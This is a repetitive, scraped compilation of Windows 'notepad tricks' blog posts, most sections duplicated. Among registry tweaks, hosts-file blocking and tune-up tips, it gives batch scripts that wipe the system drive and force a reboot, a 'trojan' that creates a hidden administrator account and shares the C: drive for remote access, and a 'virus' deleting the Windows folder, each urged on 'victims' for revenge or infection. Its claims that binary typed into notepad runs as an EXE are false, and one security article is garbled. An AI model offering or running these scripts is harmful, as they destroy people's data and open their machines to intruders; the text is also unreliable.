***NOTE : These articles are intended for IT Professionals and systems administrators with experience servicing computer hardware. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. We are not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury. ***
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.
Step 1.
Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X -- this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X -- this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don't mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.
Step 1.
Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X -- this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X -- this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don't mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
CREATE YOUR OWN TROJEN!!!
***NOTE : These articles are intended for IT Professionals and systems administrators with experience servicing computer hardware. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. We are not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury. ***
Open a dos prompt we will only need a dos prompt and windows xp operating system
-Basics-
Opening a dos prompt -> Go to start and then execute and type
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:
dir
pause
And now save this as test.bat and execute it.
Funny ain't it ?
---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.
Command #1-> net user prudhvi /add
What does this do? It makes a new user called prudhvi you can put
any name you want
Command #2-> net localgroup administrators prudhvi /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.
Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.
-!extras!-
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your c
Contd....
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.
Command #1 -> net use \\victimip neo
This command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.
Command #2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C:/ drive with administrators access!!!
Have Fun !!!!
***NOTE : These articles are intended for IT Professionals and systems administrators with experience servicing computer hardware. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. We are not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury. ***
Open a dos prompt we will only need a dos prompt and windows xp operating system
-Basics-
Opening a dos prompt -> Go to start and then execute and type
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:
dir
pause
And now save this as test.bat and execute it.
Funny ain't it ?
---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.
Command #1-> net user prudhvi /add
What does this do? It makes a new user called prudhvi you can put
any name you want
Command #2-> net localgroup administrators prudhvi /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.
Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.
-!extras!-
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your c
Contd....
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.
Command #1 -> net use \\victimip neo
This command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.
Command #2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C:/ drive with administrators access!!!
Have Fun !!!!
There is a simple feature in Notepad that can make it work like a personal diary for you.Here is how to go about it:
1.Firstly open a blank Notepad file.
2. Now write .LOG as the first line in the file, then press enter. Now save the file and close it.
3.Open the notepad file now and you will find that the current date and time has been
appended (put) at the end and the cursor is in the next line.
4. Type your notes and then save and close the file.
5. Each time you open the file, Notepad repeats the process,that is it appends the date and time
to the end of the file and places the cursor below it.
1.Firstly open a blank Notepad file.
2. Now write .LOG as the first line in the file, then press enter. Now save the file and close it.
3.Open the notepad file now and you will find that the current date and time has been
appended (put) at the end and the cursor is in the next line.
4. Type your notes and then save and close the file.
5. Each time you open the file, Notepad repeats the process,that is it appends the date and time
to the end of the file and places the cursor below it.
here we go:
1.) Restrict Display Properties:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System
create DWORD value NoDispCPL and set its value to 1
2.) Restrict Taskbar Properties:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoSetTaskbar and set its value to 1
3.) Restrict Folder Options:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoFolderOptions and set its value to 1
4.) Restrict Locking/Unlocking the taskbar:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value LockTaskbar and set its value to 1
5.) Restrict Active Desktop:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoActiveDesktop and set its value to 1
6.) Restrict adding/deleting items from Toolbars:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoToolbarCustomize and set its value to 1
7.) Restrict adding/deleting toolbars:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoBandCustomize and set its value to 1
8.) Restrict right-click in Start Menu:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoChangeStartMenu and set its value to 1
9.) Restrict Desktop Cleanup Wizard:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoDesktopCleanupWizard and set its value to 1
1.) Restrict Display Properties:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System
create DWORD value NoDispCPL and set its value to 1
2.) Restrict Taskbar Properties:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoSetTaskbar and set its value to 1
3.) Restrict Folder Options:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoFolderOptions and set its value to 1
4.) Restrict Locking/Unlocking the taskbar:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value LockTaskbar and set its value to 1
5.) Restrict Active Desktop:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoActiveDesktop and set its value to 1
6.) Restrict adding/deleting items from Toolbars:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoToolbarCustomize and set its value to 1
7.) Restrict adding/deleting toolbars:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoBandCustomize and set its value to 1
8.) Restrict right-click in Start Menu:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoChangeStartMenu and set its value to 1
9.) Restrict Desktop Cleanup Wizard:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
create DWORD value NoDesktopCleanupWizard and set its value to 1
Computers becoming slow or performing lousy is a common problem. The good news is that you don’t have to worry about replacing your computer since there are 3 quick tricks that will boost your computer speed with ease.
1. Delete unwanted files and programs. – You more than likely have several different programs and files that you have installed that you do not use. All this is doing is taking up large amounts of space. Remove these files and you’ll get a tremendous boost in speed. Also, you can increase your start up speed by removing uneccessary start up files. And also make sure you get an antivirus program to get rid of any possible viruses or worms on your PC that could be causing serious potential damage.
2. Defragment your hard drive. – This is a highly recommended step that you should do often which will help increase your computer speed and performance. This process will organize files on your hard drive.
3. Get your registry cleaned. – This is the most recommended step as this will give your computer a complete overhaul with performance and speed. You see, each time you remove, run, or install a program, this information is stored in the registry. Over time, your registry will become so over loaded with information and errors that it will cause your PC to run poorly and have errors popping up all over the place.
1. Delete unwanted files and programs. – You more than likely have several different programs and files that you have installed that you do not use. All this is doing is taking up large amounts of space. Remove these files and you’ll get a tremendous boost in speed. Also, you can increase your start up speed by removing uneccessary start up files. And also make sure you get an antivirus program to get rid of any possible viruses or worms on your PC that could be causing serious potential damage.
2. Defragment your hard drive. – This is a highly recommended step that you should do often which will help increase your computer speed and performance. This process will organize files on your hard drive.
3. Get your registry cleaned. – This is the most recommended step as this will give your computer a complete overhaul with performance and speed. You see, each time you remove, run, or install a program, this information is stored in the registry. Over time, your registry will become so over loaded with information and errors that it will cause your PC to run poorly and have errors popping up all over the place.
Renaming the Recycle Bin
Ever wanted to rename your recycle bin? Who wouldn't?
Well, it's pretty simple, the bare bones of it are just typing in commands to the registry.
Ok, what you do is, copy this information (in bold) to notepad or something similar.
(Start-->All Programs-->Accessories-->Notepad).
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000
Once you have that copied into NotePad, save it as something like "Recyclebin.reg" (without the quotations).
Then, find whereever you saved it, click on it, say yes, and BAM!
Then whenever you want to rename it just right-click and select rename!
Ever wanted to rename your recycle bin? Who wouldn't?
Well, it's pretty simple, the bare bones of it are just typing in commands to the registry.
Ok, what you do is, copy this information (in bold) to notepad or something similar.
(Start-->All Programs-->Accessories-->Notepad).
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000
Once you have that copied into NotePad, save it as something like "Recyclebin.reg" (without the quotations).
Then, find whereever you saved it, click on it, say yes, and BAM!
Then whenever you want to rename it just right-click and select rename!
How to Make your own Virus
1. First of all Open your notepad and type the following………
del c:\boot?ini c:\del autoexec.bat
2. Now Save as anyname.exe. Create this in C: drive
The only thing you need is Notepad.
3. Create a text file called TEST.txt(empty) in C:\
4. Now in your notepad type “erase C:\TEST.txt” (without the quotes). Then save it as
“Test.cmd”.
5. Now run the file “Test.cmd”go to C:\ and you’ll see your Test.txt is gone.
6. Now, the real work :
Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd.
7. Now DON’T Run the file or you’ll lose your WINDOWS map.
So, that’s the Virus. In this way you can make a virus to delete any file you want.
Now to take revenge. Send you file to your victim. Once victim opens it. WINDOWS map is
Deleted. And he will have to install WINDOWS again.
Beware: Its simple but a strong virus that can delete anyones Windows OS …
1. First of all Open your notepad and type the following………
del c:\boot?ini c:\del autoexec.bat
2. Now Save as anyname.exe. Create this in C: drive
The only thing you need is Notepad.
3. Create a text file called TEST.txt(empty) in C:\
4. Now in your notepad type “erase C:\TEST.txt” (without the quotes). Then save it as
“Test.cmd”.
5. Now run the file “Test.cmd”go to C:\ and you’ll see your Test.txt is gone.
6. Now, the real work :
Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd.
7. Now DON’T Run the file or you’ll lose your WINDOWS map.
So, that’s the Virus. In this way you can make a virus to delete any file you want.
Now to take revenge. Send you file to your victim. Once victim opens it. WINDOWS map is
Deleted. And he will have to install WINDOWS again.
Beware: Its simple but a strong virus that can delete anyones Windows OS …
HOW TO BLOCK WEBSITES WITHOUT USING ANY SOFTWARE
Steps:
1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.blockedsite.com
-->www.blockedsite.com is now unaccessable<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.
IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com
etc
Steps:
1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.blockedsite.com
-->www.blockedsite.com is now unaccessable<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.
IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com
etc
Hide 'User Accounts' from users
1.Go to Start/Run, and type: GPEDIT.MSC
2.Open the path
User Config > Admin Templates > Control Panel
3.doubleclick "Hide specified Control Panel applets"
4.put a dot in 'enabled', then click 'Show"
5.click Add button,type "nusrmgt.cpl" into the add box
Read more: http://praveenkumarg.blogspot.com/2008/10/hide-user-accounts-from-users.html#ixzz0R64yBf6j
1.Go to Start/Run, and type: GPEDIT.MSC
2.Open the path
User Config > Admin Templates > Control Panel
3.doubleclick "Hide specified Control Panel applets"
4.put a dot in 'enabled', then click 'Show"
5.click Add button,type "nusrmgt.cpl" into the add box
Read more: http://praveenkumarg.blogspot.com/2008/10/hide-user-accounts-from-users.html#ixzz0R64yBf6j
Everybody just has to have a computer these days. Life without a computer is unimaginable. I am sure that there are those who feel that life without a computer is impossible. There was a time when food, clothing and shelter were the only necessities that man had. Fast forward to today, and we have yet another necessity to add to that list -- Say hello to the friendly neighborhood computer.
Of course, now that you have a computer, you have to work on it. Certainly, there must be people who keep their PCs covered throughout the year, removing the covers once a month only to check if it is still working. But you don't need me to tell you that such people are exceptions, not the rule. So for all those of us that have to be on our computers everyday, how do we make sure that our computers are working perfectly? This is where computer tips & tricks come in.
One important aspect that requires you to use computer tips & tricks is in ensuring that your computer does not become unnecessarily slow. We all want our computers to work at the speed of light. You can ensure that your computer remains quick by carrying out Scandisk and Defrag -- two methods that are used to make your computer faster.
The function of Scandisk is to find and correct errors on the hard disk of a computer. Defrag performs the task of making sure that data files that have been stored across the disk are now reorganized in a continuous order. Defrag helps free space in which new data can now be stored. Both Scandisk and Defrag should be carried out regularly to make sure that your computer's hard disk is both error-free and not overloaded.
These two operations are among the most important of the many gazillion computer tips & tricks that computer experts recommend you to make use of. If you have embarked on a journey to find some of the best computer tips & tricks, you are not going to return empty-handed. With a large percent of the population of the world having become dependent on computers technical snags become inevitable. And the consequence of these snags is that one finds cures and way of preventing them.
So don't lose heart if your computer is threatening to crash. Consult a computer expert or a reliable online website and find some great computer tips & tricks to take care of your PC problems.
Of course, now that you have a computer, you have to work on it. Certainly, there must be people who keep their PCs covered throughout the year, removing the covers once a month only to check if it is still working. But you don't need me to tell you that such people are exceptions, not the rule. So for all those of us that have to be on our computers everyday, how do we make sure that our computers are working perfectly? This is where computer tips & tricks come in.
One important aspect that requires you to use computer tips & tricks is in ensuring that your computer does not become unnecessarily slow. We all want our computers to work at the speed of light. You can ensure that your computer remains quick by carrying out Scandisk and Defrag -- two methods that are used to make your computer faster.
The function of Scandisk is to find and correct errors on the hard disk of a computer. Defrag performs the task of making sure that data files that have been stored across the disk are now reorganized in a continuous order. Defrag helps free space in which new data can now be stored. Both Scandisk and Defrag should be carried out regularly to make sure that your computer's hard disk is both error-free and not overloaded.
These two operations are among the most important of the many gazillion computer tips & tricks that computer experts recommend you to make use of. If you have embarked on a journey to find some of the best computer tips & tricks, you are not going to return empty-handed. With a large percent of the population of the world having become dependent on computers technical snags become inevitable. And the consequence of these snags is that one finds cures and way of preventing them.
So don't lose heart if your computer is threatening to crash. Consult a computer expert or a reliable online website and find some great computer tips & tricks to take care of your PC problems.
The best way to keep the team safeComputer security is very important and a very important aspect of the team, especially when the team has a wealth of vital information and documents that you can not afford to lose. A large number of computer users suffer from data loss due to poor computer security. If your computer is vulnerable to attack by viruses, which are prone to experiment with computer crashes and data loss heavy. Keep your computer safe and secure is like owning a car, feed, wash and oil change, make the car offers the best performance. In this article I will share with you some steps to take from others to keep your computer safe and guaranteed.
1. RightIf limit user account that has administrative rights on the computer which means you can install anything and does not constitute for the computer system and the virus using his administrative law can be installed on your computer, and also introduce registry values. But when you limit the right of users to an advanced user, there is no autorun file will be able to run on your computer without your permission, and not the system configuration will take place on your computer without your permission, but when you want to install a program that is right-click the program and click Run As and then type the user name and password. Or register for the current user and administrative access to install or configure the computer. Change the right user account can be found here. This is the first step in protecting your computer.
2. The use of Internet security softwareUsing a guarantee of good internet not only keep you safe from viruses, spyware and malware also monitor also monitor the connection to the Internet and sites that are harmful to the computer is a good connection security internet should be blocked upgradeable and easy to use and configure, and must be able to provide malicious programs and sites and rapid intervention by the user to run or block. Remember that you must make sure that the antivirus solution is constantly updated.
3. RegularlyPerforming cleaning the cleaning system, the system erases all junk files that accumulate in the computer memory. If you regularly clean your computer, your system will run faster. Cleaning the junk files to read the article here.
4. Scanning external drives: Because you can never know if a hard outer shell to look at a virus, you need to scan every external hard drive connected to your computer before use. Finally scan your computer frequently, so if any infected files entered in the computer, your internet security to remove it. If these measures are taken, you're on track to keep your computer safe and guaranteed.
1. RightIf limit user account that has administrative rights on the computer which means you can install anything and does not constitute for the computer system and the virus using his administrative law can be installed on your computer, and also introduce registry values. But when you limit the right of users to an advanced user, there is no autorun file will be able to run on your computer without your permission, and not the system configuration will take place on your computer without your permission, but when you want to install a program that is right-click the program and click Run As and then type the user name and password. Or register for the current user and administrative access to install or configure the computer. Change the right user account can be found here. This is the first step in protecting your computer.
2. The use of Internet security softwareUsing a guarantee of good internet not only keep you safe from viruses, spyware and malware also monitor also monitor the connection to the Internet and sites that are harmful to the computer is a good connection security internet should be blocked upgradeable and easy to use and configure, and must be able to provide malicious programs and sites and rapid intervention by the user to run or block. Remember that you must make sure that the antivirus solution is constantly updated.
3. RegularlyPerforming cleaning the cleaning system, the system erases all junk files that accumulate in the computer memory. If you regularly clean your computer, your system will run faster. Cleaning the junk files to read the article here.
4. Scanning external drives: Because you can never know if a hard outer shell to look at a virus, you need to scan every external hard drive connected to your computer before use. Finally scan your computer frequently, so if any infected files entered in the computer, your internet security to remove it. If these measures are taken, you're on track to keep your computer safe and guaranteed.

